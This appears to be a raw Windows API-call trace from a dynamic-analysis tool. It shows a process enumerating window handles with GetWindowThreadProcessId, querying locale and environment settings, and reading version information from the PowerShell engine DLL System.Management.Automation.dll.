	[0942.508] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1578
	[0942.508] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x16c0
	[0942.508] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x161c
	[0942.509] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1638
	[0942.509] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x15c8
	[0942.509] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1554
	[0942.509] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1674
	[0942.509] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1520
	[0942.509] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x14bc
	[0942.509] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xf8c
	[0942.509] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xe9c
	[0942.509] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1434
	[0942.509] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x14ec
	[0942.509] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xfcc
	[0942.509] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x12ac
	[0942.509] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1484
	[0942.510] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x934
	[0942.510] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xc0c
	[0942.510] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xb08
	[0942.510] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x948
	[0942.510] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1178
	[0942.510] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x13e0
	[0942.510] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xcd0
	[0942.510] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x13fc
	[0942.510] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xdc8
	[0942.510] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xc18
	[0942.510] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xc2c
	[0942.510] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xa1c
	[0942.510] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1244
	[0942.511] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xdb0
	[0942.511] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1398
	[0942.511] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1358
	[0942.511] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1370
	[0942.511] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1340
	[0942.511] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x130c
	[0942.511] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x12c0
	[0942.511] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x12e4
	[0942.511] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1270
	[0942.511] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1298
	[0942.511] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x120c
	[0942.511] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x122c
	[0942.511] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x11c4
	[0942.511] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x11b0
	[0942.512] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1188
	[0942.512] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1148
	[0942.512] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1160
	[0942.512] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x10fc
	[0942.512] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xe34
	[0942.512] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xea4
	[0942.512] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x514
	[0942.512] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xe48
	[0942.512] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xbc8
	[0942.512] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xdf8
	[0942.512] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x318
	[0942.512] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xcac
	[0942.512] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x8bc
	[0942.513] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xf9c
	[0942.513] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xf48
	[0942.513] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xe40
	[0942.513] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xecc
	[0942.513] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xeb8
	[0942.513] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xe80
	[0942.513] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xe98
	[0942.513] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xe60
	[0942.513] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xee4
	[0942.513] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xf00
	[0942.513] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xdf0
	[0942.513] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xe1c
	[0942.513] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xdd0
	[0942.514] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xd94
	[0942.514] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xd74
	[0942.514] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xd00
	[0942.514] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xcd8
	[0942.514] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xc84
	[0942.514] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xca4
	[0942.514] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xc64
	[0942.514] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xc24
	[0942.514] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xb84
	[0942.514] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xbac
	[0942.514] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x384
	[0942.514] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xab8
	[0942.514] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x33c
	[0942.514] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xa44
	[0942.515] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xa64
	[0942.515] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x8a8
	[0942.515] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xaf0
	[0942.515] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x88c
	[0942.515] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xb04
	[0942.515] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x910
	[0942.515] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x230
	[0942.515] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xac0
	[0942.515] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xab4
	[0942.515] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xaac
	[0942.515] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x3d0
	[0942.515] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x978
	[0942.515] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xa7c
	[0942.516] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x59c
	[0942.516] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xa88
	[0942.516] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xa6c
	[0942.516] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xa68
	[0942.516] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x9f8
	[0942.516] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xa04
	[0942.516] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x924
	[0942.516] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x8dc
	[0942.516] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x7dc
	[0942.516] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x768
	[0942.516] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x764
	[0942.516] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x820
	[0942.516] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x810
	[0942.516] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x794
	[0942.517] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x83c
	[0942.517] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x7ac
	[0942.517] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xb44
	[0942.517] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x6bc
	[0942.517] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xb5c
	[0942.517] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x838
	[0942.517] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.517] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.517] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.517] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.517] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.517] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.517] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.518] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.518] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x818
	[0942.518] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x5b8
	[0942.518] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x494
	[0942.518] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1ec
	[0942.518] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x440
	[0942.518] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x7e8
	[0942.518] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x730
	[0942.518] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x2c8
	[0942.518] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x31c
	[0942.522] WerSetFlags () returned 0x0
	[0942.800] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0942.800] CoTaskMemFree (pv=0x0) 
	[0942.801] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1ae0e8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1ae0e0 | out: pulNumLanguages=0x1ae0e8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1ae0e0) returned 1
	[0942.801] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1ae0e8, pwszLanguagesBuffer=0x2e4f1d8, pcchLanguagesBuffer=0x1ae0e0 | out: pulNumLanguages=0x1ae0e8, pwszLanguagesBuffer=0x2e4f1d8, pcchLanguagesBuffer=0x1ae0e0) returned 1
	[0942.806] CoTaskMemAlloc (cb=0x24) returned 0x3ec320
	[0942.806] GetUserDefaultLocaleName (in: lpLocaleName=0x3ec320, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0942.806] CoTaskMemFree (pv=0x3ec320) 
	[0942.828] CoTaskMemAlloc (cb=0x104) returned 0x3d9040
	[0942.828] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0942.828] CoTaskMemFree (pv=0x3d9040) 
	[0942.830] CoTaskMemAlloc (cb=0x104) returned 0x3d9040
	[0942.830] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0942.830] CoTaskMemFree (pv=0x3d9040) 
	[0942.832] CoTaskMemAlloc (cb=0x104) returned 0x3d9040
	[0942.832] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0942.832] CoTaskMemFree (pv=0x3d9040) 
	[0943.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1adab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0943.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1adb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0943.263] SetErrorMode (uMode=0x1) returned 0x1
	[0943.264] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1add60 | out: lpFileInformation=0x1add60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0943.264] SetErrorMode (uMode=0x1) returned 0x1
	[0943.264] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1adfd0 | out: lpdwHandle=0x1adfd0) returned 0x94c
	[0943.265] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e52a68 | out: lpData=0x2e52a68) returned 1
	[0943.266] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1adf48, puLen=0x1adf40 | out: lplpBuffer=0x1adf48*=0x2e52b04, puLen=0x1adf40) returned 1
	[0943.266] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1adeb8, puLen=0x1adeb0 | out: lplpBuffer=0x1adeb8*=0x2e52be0, puLen=0x1adeb0) returned 1
	[0943.267] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0943.267] CoTaskMemAlloc (cb=0x2e) returned 0x3e7060
	[0943.267] lstrcpyW (in: lpString1=0x3e7060, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0943.267] CoTaskMemFree (pv=0x3e7060) 
	[0943.267] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1adeb8, puLen=0x1adeb0 | out: lplpBuffer=0x1adeb8*=0x2e52c34, puLen=0x1adeb0) returned 1
	[0943.267] lstrlenW (lpString="System.Management.Automation") returned 28
	[0943.267] CoTaskMemAlloc (cb=0x3c) returned 0x368fd0
	[0943.267] lstrcpyW (in: lpString1=0x368fd0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0943.267] CoTaskMemFree (pv=0x368fd0) 
	[0943.267] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1adeb8, puLen=0x1adeb0 | out: lplpBuffer=0x1adeb8*=0x2e52c90, puLen=0x1adeb0) returned 1
	[0943.267] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0943.267] CoTaskMemAlloc (cb=0x20) returned 0x3ec380
	[0943.267] lstrcpyW (in: lpString1=0x3ec380, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0943.267] CoTaskMemFree (pv=0x3ec380) 
	[0943.267] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1adeb8, puLen=0x1adeb0 | out: lplpBuffer=0x1adeb8*=0x2e52cd0, puLen=0x1adeb0) returned 1
	[0943.267] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0943.267] CoTaskMemAlloc (cb=0x44) returned 0x368fd0
	[0943.267] lstrcpyW (in: lpString1=0x368fd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0943.267] CoTaskMemFree (pv=0x368fd0) 
	[0943.267] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1adeb8, puLen=0x1adeb0 | out: lplpBuffer=0x1adeb8*=0x2e52d38, puLen=0x1adeb0) returned 1
	[0943.267] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0943.267] CoTaskMemAlloc (cb=0x76) returned 0x38f2e0
	[0943.267] lstrcpyW (in: lpString1=0x38f2e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0943.267] CoTaskMemFree (pv=0x38f2e0) 
	[0943.267] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1adeb8, puLen=0x1adeb0 | out: lplpBuffer=0x1adeb8*=0x2e52dd4, puLen=0x1adeb0) returned 1
	[0943.268] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0943.268] CoTaskMemAlloc (cb=0x44) returned 0x368fd0
	[0943.268] lstrcpyW (in: lpString1=0x368fd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0943.268] CoTaskMemFree (pv=0x368fd0) 
	[0943.268] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1adeb8, puLen=0x1adeb0 | out: lplpBuffer=0x1adeb8*=0x2e52e38, puLen=0x1adeb0) returned 1
	[0943.268] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0943.268] CoTaskMemAlloc (cb=0x58) returned 0x345680
	[0943.268] lstrcpyW (in: lpString1=0x345680, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0943.268] CoTaskMemFree (pv=0x345680) 
	[0943.268] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1adeb8, puLen=0x1adeb0 | out: lplpBuffer=0x1adeb8*=0x2e52eb4, puLen=0x1adeb0) returned 1
	[0943.268] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0943.268] CoTaskMemAlloc (cb=0x20) returned 0x3ec380
	[0943.268] lstrcpyW (in: lpString1=0x3ec380, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0943.268] CoTaskMemFree (pv=0x3ec380) 
	[0943.268] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1adeb8, puLen=0x1adeb0 | out: lplpBuffer=0x1adeb8*=0x2e52b5c, puLen=0x1adeb0) returned 1
	[0943.268] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
